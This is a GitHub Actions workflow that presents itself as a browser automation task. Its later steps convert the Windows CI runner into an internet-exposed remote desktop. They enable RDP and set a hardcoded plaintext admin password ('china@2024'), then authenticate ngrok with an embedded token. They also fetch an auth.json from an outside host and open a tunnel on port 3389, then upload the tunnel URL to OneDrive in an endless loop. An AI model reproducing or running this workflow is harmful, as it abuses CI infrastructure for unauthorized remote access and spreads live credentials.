name: Automation-Task
on:
  workflow_dispatch:
  schedule:
    - cron: '30 2 * */9 6'

jobs:
  build:
    runs-on: windows-latest
    steps:
    - uses: actions/checkout@v3

    - name: Setup Node.js
      uses: actions/setup-node@v3
      with:
        node-version: '20'

    - name: Install dependencies
      run: npm install

    - name: Run browser automation
      run: node script.js

    # 下面是原本的 RDP/Ngrok 逻辑
    - name: Download ngrok
      run: Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip

    - name: Extract ngrok
      run: Expand-Archive ngrok.zip

    - name: Auth ngrok
      run: .\ngrok\ngrok.exe authtoken 2b23SXwv12oERERE0Uss5g79LQo_aYFcUWaxEgSMPXoycW5P

    - name: Enable TS and RDP
      run: |
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
        Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "china@2024" -Force)

    - name: OneDrive Sync
      run: |
        Invoke-WebRequest https://github.com/MoeClub/OneList/raw/master/OneDriveUploader/amd64/win/OneDriveUploader.exe -OutFile OneDriveUploader.exe
        Invoke-WebRequest https://goorm326.alwaysdata.net/auth.json -OutFile auth.json
        New-Item -ItemType Directory -Path "wwww"
        .\OneDriveUploader.exe -c auth.json -s "wwww"

    - name: Start ngrok and Loop
      shell: pwsh
      run: |
        Start-Process -FilePath "./ngrok/ngrok.exe" -ArgumentList "tcp 3389" -NoNewWindow
        Start-Sleep -s 20
        $tunnels = Invoke-RestMethod -Method Get -Uri "http://localhost:4040/api/tunnels"
        $public_url = $tunnels.tunnels.public_url
        $public_url | Out-File -FilePath "wwww/ngrok_url.txt"
        while ($true) {
          .\OneDriveUploader.exe -c auth.json -s "wwww"
          Start-Sleep -s 60
        }
